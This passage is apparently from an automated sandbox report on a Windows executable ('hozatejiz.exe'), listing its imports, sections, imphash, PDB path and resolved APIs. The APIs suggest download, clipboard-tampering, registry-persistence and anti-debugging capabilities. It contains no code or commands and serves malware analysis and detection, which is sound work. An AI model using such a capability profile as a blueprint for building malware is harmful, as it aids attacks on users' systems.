  1133. "name": "FlushFileBuffers",
  1134. "address": "0x426078"
  1135. },
  1136. {
  1137. "name": "WriteFile",
  1138. "address": "0x42607c"
  1139. },
  1140. {
  1141. "name": "WideCharToMultiByte",
  1142. "address": "0x426080"
  1143. },
  1144. {
  1145. "name": "GetConsoleCP",
  1146. "address": "0x426084"
  1147. },
  1148. {
  1149. "name": "GetConsoleMode",
  1150. "address": "0x426088"
  1151. },
  1152. {
  1153. "name": "DeleteCriticalSection",
  1154. "address": "0x42608c"
  1155. },
  1156. {
  1157. "name": "FatalAppExitA",
  1158. "address": "0x426090"
  1159. },
  1160. {
  1161. "name": "GetModuleHandleExW",
  1162. "address": "0x426094"
  1163. },
  1164. {
  1165. "name": "AreFileApisANSI",
  1166. "address": "0x426098"
  1167. },
  1168. {
  1169. "name": "MultiByteToWideChar",
  1170. "address": "0x42609c"
  1171. },
  1172. {
  1173. "name": "HeapSize",
  1174. "address": "0x4260a0"
  1175. },
  1176. {
  1177. "name": "HeapFree",
  1178. "address": "0x4260a4"
  1179. },
  1180. {
  1181. "name": "HeapAlloc",
  1182. "address": "0x4260a8"
  1183. },
  1184. {
  1185. "name": "SetLastError",
  1186. "address": "0x4260ac"
  1187. },
  1188. {
  1189. "name": "GetCurrentThread",
  1190. "address": "0x4260b0"
  1191. },
  1192. {
  1193. "name": "GetCurrentThreadId",
  1194. "address": "0x4260b4"
  1195. },
  1196. {
  1197. "name": "GetProcessHeap",
  1198. "address": "0x4260b8"
  1199. },
  1200. {
  1201. "name": "GetStdHandle",
  1202. "address": "0x4260bc"
  1203. },
  1204. {
  1205. "name": "GetFileType",
  1206. "address": "0x4260c0"
  1207. },
  1208. {
  1209. "name": "GetStartupInfoW",
  1210. "address": "0x4260c4"
  1211. },
  1212. {
  1213. "name": "GetModuleFileNameA",
  1214. "address": "0x4260c8"
  1215. },
  1216. {
  1217. "name": "GetModuleFileNameW",
  1218. "address": "0x4260cc"
  1219. },
  1220. {
  1221. "name": "QueryPerformanceCounter",
  1222. "address": "0x4260d0"
  1223. },
  1224. {
  1225. "name": "GetCurrentProcessId",
  1226. "address": "0x4260d4"
  1227. },
  1228. {
  1229. "name": "GetSystemTimeAsFileTime",
  1230. "address": "0x4260d8"
  1231. },
  1232. {
  1233. "name": "GetEnvironmentStringsW",
  1234. "address": "0x4260dc"
  1235. },
  1236. {
  1237. "name": "FreeEnvironmentStringsW",
  1238. "address": "0x4260e0"
  1239. },
  1240. {
  1241. "name": "UnhandledExceptionFilter",
  1242. "address": "0x4260e4"
  1243. },
  1244. {
  1245. "name": "SetUnhandledExceptionFilter",
  1246. "address": "0x4260e8"
  1247. },
  1248. {
  1249. "name": "InitializeCriticalSectionAndSpinCount",
  1250. "address": "0x4260ec"
  1251. },
  1252. {
  1253. "name": "CreateEventW",
  1254. "address": "0x4260f0"
  1255. },
  1256. {
  1257. "name": "Sleep",
  1258. "address": "0x4260f4"
  1259. },
  1260. {
  1261. "name": "GetCurrentProcess",
  1262. "address": "0x4260f8"
  1263. },
  1264. {
  1265. "name": "TerminateProcess",
  1266. "address": "0x4260fc"
  1267. },
  1268. {
  1269. "name": "TlsAlloc",
  1270. "address": "0x426100"
  1271. },
  1272. {
  1273. "name": "TlsGetValue",
  1274. "address": "0x426104"
  1275. },
  1276. {
  1277. "name": "TlsSetValue",
  1278. "address": "0x426108"
  1279. },
  1280. {
  1281. "name": "TlsFree",
  1282. "address": "0x42610c"
  1283. },
  1284. {
  1285. "name": "GetModuleHandleW",
  1286. "address": "0x426110"
  1287. },
  1288. {
  1289. "name": "CreateSemaphoreW",
  1290. "address": "0x426114"
  1291. },
  1292. {
  1293. "name": "SetStdHandle",
  1294. "address": "0x426118"
  1295. },
  1296. {
  1297. "name": "SetFilePointerEx",
  1298. "address": "0x42611c"
  1299. },
  1300. {
  1301. "name": "WriteConsoleW",
  1302. "address": "0x426120"
  1303. },
  1304. {
  1305. "name": "SetConsoleCtrlHandler",
  1306. "address": "0x426124"
  1307. },
  1308. {
  1309. "name": "FreeLibrary",
  1310. "address": "0x426128"
  1311. },
  1312. {
  1313. "name": "LoadLibraryExW",
  1314. "address": "0x42612c"
  1315. },
  1316. {
  1317. "name": "IsValidCodePage",
  1318. "address": "0x426130"
  1319. },
  1320. {
  1321. "name": "GetACP",
  1322. "address": "0x426134"
  1323. },
  1324. {
  1325. "name": "GetOEMCP",
  1326. "address": "0x426138"
  1327. },
  1328. {
  1329. "name": "GetCPInfo",
  1330. "address": "0x42613c"
  1331. },
  1332. {
  1333. "name": "HeapReAlloc",
  1334. "address": "0x426140"
  1335. },
  1336. {
  1337. "name": "GetDateFormatW",
  1338. "address": "0x426144"
  1339. },
  1340. {
  1341. "name": "GetTimeFormatW",
  1342. "address": "0x426148"
  1343. },
  1344. {
  1345. "name": "CompareStringW",
  1346. "address": "0x42614c"
  1347. },
  1348. {
  1349. "name": "LCMapStringW",
  1350. "address": "0x426150"
  1351. },
  1352. {
  1353. "name": "GetLocaleInfoW",
  1354. "address": "0x426154"
  1355. },
  1356. {
  1357. "name": "IsValidLocale",
  1358. "address": "0x426158"
  1359. },
  1360. {
  1361. "name": "GetUserDefaultLCID",
  1362. "address": "0x42615c"
  1363. },
  1364. {
  1365. "name": "EnumSystemLocalesW",
  1366. "address": "0x426160"
  1367. },
  1368. {
  1369. "name": "OutputDebugStringW",
  1370. "address": "0x426164"
  1371. },
  1372. {
  1373. "name": "GetStringTypeW",
  1374. "address": "0x426168"
  1375. },
  1376. {
  1377. "name": "CreateFileW",
  1378. "address": "0x42616c"
  1379. }
  1380. ],
  1381. "dll": "KERNEL32.dll"
  1382. }
  1383. ],
  1384. "digital_signers": null,
  1385. "exported_dll_name": "hozatejiz.exe",
  1386. "actual_checksum": "0x00044ae0",
  1387. "overlay": null,
  1388. "imagebase": "0x00400000",
  1389. "reported_checksum": "0x00044ae0",
  1390. "icon_hash": null,
  1391. "entrypoint": "0x00403a61",
  1392. "timestamp": "2018-06-17 04:22:09",
  1393. "osversion": "5.1",
  1394. "sections": [
  1395. {
  1396. "name": ".text",
  1397. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  1398. "virtual_address": "0x00001000",
  1399. "size_of_data": "0x00025000",
  1400. "entropy": "6.72",
  1401. "raw_address": "0x00000400",
  1402. "virtual_size": "0x00024ebd",
  1403. "characteristics_raw": "0x60000020"
  1404. },
  1405. {
  1406. "name": ".rdata",
  1407. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1408. "virtual_address": "0x00026000",
  1409. "size_of_data": "0x00009000",
  1410. "entropy": "4.71",
  1411. "raw_address": "0x00025400",
  1412. "virtual_size": "0x00008ee0",
  1413. "characteristics_raw": "0x40000040"
  1414. },
  1415. {
  1416. "name": ".data",
  1417. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1418. "virtual_address": "0x0002f000",
  1419. "size_of_data": "0x00001a00",
  1420. "entropy": "3.42",
  1421. "raw_address": "0x0002e400",
  1422. "virtual_size": "0x04e5d9ec",
  1423. "characteristics_raw": "0xc0000040"
  1424. },
  1425. {
  1426. "name": ".text",
  1427. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1428. "virtual_address": "0x04e8d000",
  1429. "size_of_data": "0x00009a00",
  1430. "entropy": "6.00",
  1431. "raw_address": "0x0002fe00",
  1432. "virtual_size": "0x0000998c",
  1433. "characteristics_raw": "0xc0000040"
  1434. },
  1435. {
  1436. "name": ".yum",
  1437. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1438. "virtual_address": "0x04e97000",
  1439. "size_of_data": "0x00000400",
  1440. "entropy": "0.00",
  1441. "raw_address": "0x00039800",
  1442. "virtual_size": "0x00001200",
  1443. "characteristics_raw": "0xc0000040"
  1444. },
  1445. {
  1446. "name": ".rsrc",
  1447. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1448. "virtual_address": "0x04e99000",
  1449. "size_of_data": "0x00002200",
  1450. "entropy": "4.72",
  1451. "raw_address": "0x00039c00",
  1452. "virtual_size": "0x00002148",
  1453. "characteristics_raw": "0x40000040"
  1454. },
  1455. {
  1456. "name": ".reloc",
  1457. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1458. "virtual_address": "0x04e9c000",
  1459. "size_of_data": "0x00002000",
  1460. "entropy": "6.62",
  1461. "raw_address": "0x0003be00",
  1462. "virtual_size": "0x00001fcc",
  1463. "characteristics_raw": "0x42000040"
  1464. }
  1465. ],
  1466. "resources": [],
  1467. "dirents": [
  1468. {
  1469. "virtual_address": "0x0002e630",
  1470. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1471. "size": "0x0000004d"
  1472. },
  1473. {
  1474. "virtual_address": "0x0002e680",
  1475. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1476. "size": "0x00000028"
  1477. },
  1478. {
  1479. "virtual_address": "0x04e99000",
  1480. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1481. "size": "0x00002148"
  1482. },
  1483. {
  1484. "virtual_address": "0x00000000",
  1485. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1486. "size": "0x00000000"
  1487. },
  1488. {
  1489. "virtual_address": "0x00000000",
  1490. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1491. "size": "0x00000000"
  1492. },
  1493. {
  1494. "virtual_address": "0x04e9c000",
  1495. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1496. "size": "0x00001fcc"
  1497. },
  1498. {
  1499. "virtual_address": "0x000261d0",
  1500. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1501. "size": "0x00000038"
  1502. },
  1503. {
  1504. "virtual_address": "0x00000000",
  1505. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1506. "size": "0x00000000"
  1507. },
  1508. {
  1509. "virtual_address": "0x00000000",
  1510. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1511. "size": "0x00000000"
  1512. },
  1513. {
  1514. "virtual_address": "0x00000000",
  1515. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1516. "size": "0x00000000"
  1517. },
  1518. {
  1519. "virtual_address": "0x00000000",
  1520. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1521. "size": "0x00000000"
  1522. },
  1523. {
  1524. "virtual_address": "0x00000000",
  1525. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1526. "size": "0x00000000"
  1527. },
  1528. {
  1529. "virtual_address": "0x00026000",
  1530. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1531. "size": "0x00000174"
  1532. },
  1533. {
  1534. "virtual_address": "0x00000000",
  1535. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1536. "size": "0x00000000"
  1537. },
  1538. {
  1539. "virtual_address": "0x00000000",
  1540. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1541. "size": "0x00000000"
  1542. },
  1543. {
  1544. "virtual_address": "0x00000000",
  1545. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1546. "size": "0x00000000"
  1547. }
  1548. ],
  1549. "exports": [
  1550. {
  1551. "ordinal": 1,
  1552. "name": "MyFunc165@@4",
  1553. "address": "0x425db0"
  1554. }
  1555. ],
  1556. "guest_signers": {},
  1557. "imphash": "e4ef01da1d05a7641f1f800f164dcec2",
  1558. "icon_fuzzy": null,
  1559. "icon": null,
  1560. "pdbpath": "C:\\xaserohakapebeh-jeron74_nonokacideyebiwac71_s.pdb\\x00\\bin\\hozatejiz.pdb\\x00\\x00\\x00\\x00\\x00\\x9d\\x00\\x00\\x00\\x9d",
  1561. "imported_dll_count": 1,
  1562. "versioninfo": []
  1563. }
  1564. }
  1565.  
  1566. [*] Resolved APIs: [
  1567. "kernel32.dll.FlsAlloc",
  1568. "kernel32.dll.FlsFree",
  1569. "kernel32.dll.FlsGetValue",
  1570. "kernel32.dll.FlsSetValue",
  1571. "kernel32.dll.InitializeCriticalSectionEx",
  1572. "kernel32.dll.CreateEventExW",
  1573. "kernel32.dll.CreateSemaphoreExW",
  1574. "kernel32.dll.SetThreadStackGuarantee",
  1575. "kernel32.dll.CreateThreadpoolTimer",
  1576. "kernel32.dll.SetThreadpoolTimer",
  1577. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
  1578. "kernel32.dll.CloseThreadpoolTimer",
  1579. "kernel32.dll.CreateThreadpoolWait",
  1580. "kernel32.dll.SetThreadpoolWait",
  1581. "kernel32.dll.CloseThreadpoolWait",
  1582. "kernel32.dll.FlushProcessWriteBuffers",
  1583. "kernel32.dll.FreeLibraryWhenCallbackReturns",
  1584. "kernel32.dll.GetCurrentProcessorNumber",
  1585. "kernel32.dll.GetLogicalProcessorInformation",
  1586. "kernel32.dll.CreateSymbolicLinkW",
  1587. "kernel32.dll.EnumSystemLocalesEx",
  1588. "kernel32.dll.CompareStringEx",
  1589. "kernel32.dll.GetDateFormatEx",
  1590. "kernel32.dll.GetLocaleInfoEx",
  1591. "kernel32.dll.GetTimeFormatEx",
  1592. "kernel32.dll.GetUserDefaultLocaleName",
  1593. "kernel32.dll.IsValidLocaleName",
  1594. "kernel32.dll.LCMapStringEx",
  1595. "kernel32.dll.GetTickCount64",
  1596. "kernel32.dll.LoadLibraryA",
  1597. "kernel32.dll.VirtualAlloc",
  1598. "kernel32.dll.VirtualProtect",
  1599. "kernel32.dll.VirtualFree",
  1600. "kernel32.dll.GetVersionExA",
  1601. "kernel32.dll.TerminateProcess",
  1602. "kernel32.dll.ExitProcess",
  1603. "kernel32.dll.SetErrorMode",
  1604. "msvcrt.dll._controlfp",
  1605. "msvcrt.dll._except_handler3",
  1606. "msvcrt.dll.__set_app_type",
  1607. "msvcrt.dll.__p__fmode",
  1608. "msvcrt.dll.isalpha",
  1609. "msvcrt.dll.__p__commode",
  1610. "msvcrt.dll._adjust_fdiv",
  1611. "msvcrt.dll.__setusermatherr",
  1612. "msvcrt.dll._initterm",
  1613. "msvcrt.dll.__getmainargs",
  1614. "msvcrt.dll._acmdln",
  1615. "msvcrt.dll.exit",
  1616. "msvcrt.dll._XcptFilter",
  1617. "msvcrt.dll._exit",
  1618. "msvcrt.dll._snprintf",
  1619. "msvcrt.dll.fclose",
  1620. "msvcrt.dll.fseek",
  1621. "msvcrt.dll.ftell",
  1622. "msvcrt.dll.wcsstr",
  1623. "msvcrt.dll._wfopen",
  1624. "msvcrt.dll.srand",
  1625. "msvcrt.dll.rand",
  1626. "msvcrt.dll._snwprintf",
  1627. "msvcrt.dll.isdigit",
  1628. "msvcrt.dll.memset",
  1629. "msvcrt.dll.memcpy",
  1630. "wininet.dll.InternetOpenUrlA",
  1631. "wininet.dll.HttpQueryInfoA",
  1632. "wininet.dll.InternetCloseHandle",
  1633. "wininet.dll.InternetReadFile",
  1634. "wininet.dll.InternetOpenUrlW",
  1635. "wininet.dll.InternetOpenW",
  1636. "wininet.dll.InternetOpenA",
  1637. "urlmon.dll.URLDownloadToFileW",
  1638. "shlwapi.dll.PathFileExistsW",
  1639. "shlwapi.dll.PathFindFileNameA",
  1640. "shlwapi.dll.PathFindFileNameW",
  1641. "kernel32.dll.GetModuleFileNameW",
  1642. "kernel32.dll.GetFileAttributesW",
  1643. "kernel32.dll.CopyFileW",
  1644. "kernel32.dll.CreateDirectoryW",
  1645. "kernel32.dll.GetLogicalDriveStringsW",
  1646. "kernel32.dll.GetDriveTypeW",
  1647. "kernel32.dll.FindFirstFileW",
  1648. "kernel32.dll.ExpandEnvironmentStringsW",
  1649. "kernel32.dll.DeleteFileW",
  1650. "kernel32.dll.CloseHandle",
  1651. "kernel32.dll.FindClose",
  1652. "kernel32.dll.WriteFile",
  1653. "kernel32.dll.GetTickCount",
  1654. "kernel32.dll.GlobalUnlock",
  1655. "kernel32.dll.Sleep",
  1656. "kernel32.dll.GlobalAlloc",
  1657. "kernel32.dll.GlobalLock",
  1658. "kernel32.dll.IsDebuggerPresent",
  1659. "kernel32.dll.GetModuleHandleA",
  1660. "kernel32.dll.Process32First",
  1661. "kernel32.dll.Process32Next",
  1662. "kernel32.dll.FindNextFileW",
  1663. "kernel32.dll.SetFileAttributesW",
  1664. "kernel32.dll.GetVolumeInformationW",
  1665. "kernel32.dll.CreateFileW",
  1666. "kernel32.dll.ExitThread",
  1667. "kernel32.dll.GetStartupInfoA",
  1668. "kernel32.dll.CreateThread",
  1669. "kernel32.dll.CreateMutexA",
  1670. "kernel32.dll.GetLastError",
  1671. "kernel32.dll.CreateToolhelp32Snapshot",
  1672. "kernel32.dll.CreateProcessW",
  1673. "user32.dll.SetClipboardData",
  1674. "user32.dll.OpenClipboard",
  1675. "user32.dll.EmptyClipboard",
  1676. "user32.dll.GetClipboardData",
  1677. "user32.dll.CloseClipboard",
  1678. "user32.dll.CharUpperA",
  1679. "advapi32.dll.RegCreateKeyExA",
  1680. "advapi32.dll.RegCloseKey",
  1681. "advapi32.dll.RegSetValueExW",
  1682. "advapi32.dll.RegOpenKeyExW",
  1683. "shell32.dll.ShellExecuteW",
  1684. "ole32.dll.CoInitialize",
  1685. "ole32.dll.CoCreateInstance",
  1686. "msvcr100.dll.atexit",
  1687. "rasapi32.dll.RasConnectionNotificationW",
  1688. "sechost.dll.NotifyServiceStatusChangeA",
  1689. "cryptbase.dll.SystemFunction036"
  1690. ]
  1691.  
  1692. [*] Static Analysis: {
  1693. "pe": {
  1694. "peid_signatures": null,
  1695. "imports": [
  1696. {
  1697. "imports": [
  1698. {
  1699. "name": "ExitProcess",
  1700. "address": "0x426000"
  1701. },
  1702. {
  1703. "name": "DebugActiveProcessStop",
  1704. "address": "0x426004"
  1705. },
  1706. {
  1707. "name": "lstrcpynA",
  1708. "address": "0x426008"
  1709. },
  1710. {
  1711. "name": "UnlockFile",
  1712. "address": "0x42600c"
  1713. },
  1714. {
  1715. "name": "GetFileAttributesExA",
  1716. "address": "0x426010"
  1717. },
  1718. {
  1719. "name": "GetTickCount",
  1720. "address": "0x426014"
  1721. },
  1722. {
  1723. "name": "GetNumberFormatA",
  1724. "address": "0x426018"
  1725. },
  1726. {
  1727. "name": "GlobalAlloc",
  1728. "address": "0x42601c"
  1729. },
  1730. {
  1731. "name": "LoadLibraryW",
  1732. "address": "0x426020"
  1733. },
  1734. {
  1735. "name": "GetConsoleAliasExesLengthW",
  1736. "address": "0x426024"
  1737. },
  1738. {
  1739. "name": "GetBinaryTypeA",
  1740. "address": "0x426028"
  1741. },
  1742. {
  1743. "name": "lstrlenW",
  1744. "address": "0x42602c"
  1745. },
  1746. {
  1747. "name": "Module32First",
  1748. "address": "0x426030"
  1749. },
  1750. {
  1751. "name": "GetLastError",
  1752. "address": "0x426034"
  1753. },
  1754. {
  1755. "name": "GetProcAddress",
  1756. "address": "0x426038"
  1757. },
  1758. {
  1759. "name": "PeekConsoleInputW",
  1760. "address": "0x42603c"
  1761. },
  1762. {
  1763. "name": "WTSGetActiveConsoleSessionId",
  1764. "address": "0x426040"
  1765. },
  1766. {
  1767. "name": "VirtualProtect",
  1768. "address": "0x426044"
  1769. },
  1770. {
  1771. "name": "CreateToolhelp32Snapshot",
  1772. "address": "0x426048"
  1773. },
  1774. {
  1775. "name": "GetCPInfoExA",
  1776. "address": "0x42604c"
  1777. },
  1778. {
  1779. "name": "CloseHandle",
  1780. "address": "0x426050"
  1781. },
  1782. {
  1783. "name": "EncodePointer",
  1784. "address": "0x426054"
  1785. },
  1786. {
  1787. "name": "DecodePointer",
  1788. "address": "0x426058"
  1789. },
  1790. {
  1791. "name": "GetCommandLineA",
  1792. "address": "0x42605c"
  1793. },
  1794. {
  1795. "name": "RaiseException",
  1796. "address": "0x426060"
  1797. },
  1798. {
  1799. "name": "RtlUnwind",
  1800. "address": "0x426064"
  1801. },
  1802. {
  1803. "name": "IsDebuggerPresent",
  1804. "address": "0x426068"
  1805. },
  1806. {
  1807. "name": "IsProcessorFeaturePresent",
  1808. "address": "0x42606c"
  1809. },
  1810. {
  1811. "name": "EnterCriticalSection",
  1812. "address": "0x426070"
  1813. },
  1814. {
  1815. "name": "LeaveCriticalSection",
  1816. "address": "0x426074"
  1817. },
  1818. {
  1819. "name": "FlushFileBuffers",
  1820. "address": "0x426078"
  1821. },
  1822. {
  1823. "name": "WriteFile",
  1824. "address": "0x42607c"
  1825. },
  1826. {
  1827. "name": "WideCharToMultiByte",
  1828. "address": "0x426080"
  1829. },
  1830. {
  1831. "name": "GetConsoleCP",
  1832. "address": "0x426084"
  1833. },
  1834. {
  1835. "name": "GetConsoleMode",
  1836. "address": "0x426088"
  1837. },
  1838. {
  1839. "name": "DeleteCriticalSection",
  1840. "address": "0x42608c"
  1841. },
  1842. {
  1843. "name": "FatalAppExitA",
  1844. "address": "0x426090"
  1845. },
  1846. {
  1847. "name": "GetModuleHandleExW",
  1848. "address": "0x426094"
  1849. },
  1850. {
  1851. "name": "AreFileApisANSI",
  1852. "address": "0x426098"
  1853. },
  1854. {
  1855. "name": "MultiByteToWideChar",
  1856. "address": "0x42609c"
  1857. },
  1858. {
  1859. "name": "HeapSize",
  1860. "address": "0x4260a0"
  1861. },
  1862. {
  1863. "name": "HeapFree",
  1864. "address": "0x4260a4"
  1865. },
  1866. {
  1867. "name": "HeapAlloc",
  1868. "address": "0x4260a8"
  1869. },
  1870. {
  1871. "name": "SetLastError",
  1872. "address": "0x4260ac"
  1873. },
  1874. {
  1875. "name": "GetCurrentThread",
  1876. "address": "0x4260b0"
  1877. },
  1878. {
  1879. "name": "GetCurrentThreadId",
  1880. "address": "0x4260b4"
  1881. },
  1882. {
  1883. "name": "GetProcessHeap",
  1884. "address": "0x4260b8"
  1885. },
  1886. {
  1887. "name": "GetStdHandle",
  1888. "address": "0x4260bc"
  1889. },
  1890. {
  1891. "name": "GetFileType",
  1892. "address": "0x4260c0"
  1893. },
  1894. {
  1895. "name": "GetStartupInfoW",
  1896. "address": "0x4260c4"
  1897. },
  1898. {
  1899. "name": "GetModuleFileNameA",
  1900. "address": "0x4260c8"
  1901. },
  1902. {
  1903. "name": "GetModuleFileNameW",
  1904. "address": "0x4260cc"
  1905. },
  1906. {
  1907. "name": "QueryPerformanceCounter",
  1908. "address": "0x4260d0"
  1909. },
  1910. {
  1911. "name": "GetCurrentProcessId",
  1912. "address": "0x4260d4"
  1913. },
  1914. {
  1915. "name": "GetSystemTimeAsFileTime",
  1916. "address": "0x4260d8"
  1917. },
  1918. {
  1919. "name": "GetEnvironmentStringsW",
  1920. "address": "0x4260dc"
  1921. },
  1922. {
  1923. "name": "FreeEnvironmentStringsW",
  1924. "address": "0x4260e0"
  1925. },
  1926. {
  1927. "name": "UnhandledExceptionFilter",
  1928. "address": "0x4260e4"
  1929. },
  1930. {
  1931. "name": "SetUnhandledExceptionFilter",
  1932. "address": "0x4260e8"
  1933. },
  1934. {
  1935. "name": "InitializeCriticalSectionAndSpinCount",
  1936. "address": "0x4260ec"
  1937. },
  1938. {
  1939. "name": "CreateEventW",
  1940. "address": "0x4260f0"
  1941. },
  1942. {
  1943. "name": "Sleep",
  1944. "address": "0x4260f4"
  1945. },
  1946. {
  1947. "name": "GetCurrentProcess",
  1948. "address": "0x4260f8"
  1949. },
  1950. {
  1951. "name": "TerminateProcess",
  1952. "address": "0x4260fc"
  1953. },
  1954. {
  1955. "name": "TlsAlloc",
  1956. "address": "0x426100"
  1957. },
  1958. {
  1959. "name": "TlsGetValue",
  1960. "address": "0x426104"
  1961. },
  1962. {
  1963. "name": "TlsSetValue",
  1964. "address": "0x426108"
  1965. },
  1966. {
  1967. "name": "TlsFree",
  1968. "address": "0x42610c"
  1969. },
  1970. {
  1971. "name": "GetModuleHandleW",
  1972. "address": "0x426110"
  1973. },
  1974. {
  1975. "name": "CreateSemaphoreW",
  1976. "address": "0x426114"
  1977. },
  1978. {
  1979. "name": "SetStdHandle",
  1980. "address": "0x426118"
  1981. },
  1982. {
  1983. "name": "SetFilePointerEx",
  1984. "address": "0x42611c"
  1985. },
  1986. {
  1987. "name": "WriteConsoleW",
  1988. "address": "0x426120"
  1989. },
  1990. {
  1991. "name": "SetConsoleCtrlHandler",
  1992. "address": "0x426124"
  1993. },
  1994. {
  1995. "name": "FreeLibrary",
  1996. "address": "0x426128"
  1997. },
  1998. {
  1999. "name": "LoadLibraryExW",
  2000. "address": "0x42612c"
  2001. },
  2002. {
  2003. "name": "IsValidCodePage",
  2004. "address": "0x426130"
  2005. },
  2006. {
  2007. "name": "GetACP",
  2008. "address": "0x426134"
  2009. },
  2010. {
  2011. "name": "GetOEMCP",
  2012. "address": "0x426138"
  2013. },
  2014. {
  2015. "name": "GetCPInfo",
  2016. "address": "0x42613c"
  2017. },
  2018. {
  2019. "name": "HeapReAlloc",
  2020. "address": "0x426140"
  2021. },
  2022. {
  2023. "name": "GetDateFormatW",
  2024. "address": "0x426144"
  2025. },
  2026. {
  2027. "name": "GetTimeFormatW",
  2028. "address": "0x426148"
  2029. },
  2030. {
  2031. "name": "CompareStringW",
  2032. "address": "0x42614c"
  2033. },
  2034. {
  2035. "name": "LCMapStringW",
  2036. "address": "0x426150"
  2037. },
  2038. {
  2039. "name": "GetLocaleInfoW",
  2040. "address": "0x426154"
  2041. },
  2042. {
  2043. "name": "IsValidLocale",
  2044. "address": "0x426158"
  2045. },
  2046. {
  2047. "name": "GetUserDefaultLCID",
  2048. "address": "0x42615c"
  2049. },
  2050. {
  2051. "name": "EnumSystemLocalesW",
  2052. "address": "0x426160"
  2053. },
  2054. {
  2055. "name": "OutputDebugStringW",
  2056. "address": "0x426164"
  2057. },
  2058. {
  2059. "name": "GetStringTypeW",
  2060. "address": "0x426168"
  2061. },
  2062. {
  2063. "name": "CreateFileW",
  2064. "address": "0x42616c"
  2065. }
  2066. ],
  2067. "dll": "KERNEL32.dll"
  2068. }
  2069. ],
  2070. "digital_signers": null,
  2071. "exported_dll_name": "hozatejiz.exe",
  2072. "actual_checksum": "0x00044ae0",
  2073. "overlay": null,
  2074. "imagebase": "0x00400000",
  2075. "reported_checksum": "0x00044ae0",
  2076. "icon_hash": null,
  2077. "entrypoint": "0x00403a61",
  2078. "timestamp": "2018-06-17 04:22:09",
  2079. "osversion": "5.1",
  2080. "sections": [
  2081. {
  2082. "name": ".text",
  2083. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  2084. "virtual_address": "0x00001000",
  2085. "size_of_data": "0x00025000",
  2086. "entropy": "6.72",
  2087. "raw_address": "0x00000400",
  2088. "virtual_size": "0x00024ebd",
  2089. "characteristics_raw": "0x60000020"
  2090. },
  2091. {
  2092. "name": ".rdata",
  2093. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2094. "virtual_address": "0x00026000",
  2095. "size_of_data": "0x00009000",
  2096. "entropy": "4.71",
  2097. "raw_address": "0x00025400",
  2098. "virtual_size": "0x00008ee0",
  2099. "characteristics_raw": "0x40000040"
  2100. },
  2101. {
  2102. "name": ".data",
  2103. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2104. "virtual_address": "0x0002f000",
  2105. "size_of_data": "0x00001a00",
  2106. "entropy": "3.42",
  2107. "raw_address": "0x0002e400",
  2108. "virtual_size": "0x04e5d9ec",
  2109. "characteristics_raw": "0xc0000040"
  2110. },
  2111. {
  2112. "name": ".text",
  2113. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2114. "virtual_address": "0x04e8d000",
  2115. "size_of_data": "0x00009a00",
  2116. "entropy": "6.00",
  2117. "raw_address": "0x0002fe00",
  2118. "virtual_size": "0x0000998c",
  2119. "characteristics_raw": "0xc0000040"
  2120. },
  2121. {
  2122. "name": ".yum",
  2123. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2124. "virtual_address": "0x04e97000",
  2125. "size_of_data": "0x00000400",
  2126. "entropy": "0.00",
  2127. "raw_address": "0x00039800",
  2128. "virtual_size": "0x00001200",
  2129. "characteristics_raw": "0xc0000040"
  2130. },
  2131. {
  2132. "name": ".rsrc",
  2133. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2134. "virtual_address": "0x04e99000",
  2135. "size_of_data": "0x00002200",
  2136. "entropy": "4.72",
  2137. "raw_address": "0x00039c00",
  2138. "virtual_size": "0x00002148",
  2139. "characteristics_raw": "0x40000040"
  2140. },
  2141. {
  2142. "name": ".reloc",
  2143. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  2144. "virtual_address": "0x04e9c000",
  2145. "size_of_data": "0x00002000",
  2146. "entropy": "6.62",
  2147. "raw_address": "0x0003be00",
  2148. "virtual_size": "0x00001fcc",
  2149. "characteristics_raw": "0x42000040"
  2150. }
  2151. ],
  2152. "resources": [],
  2153. "dirents": [
  2154. {
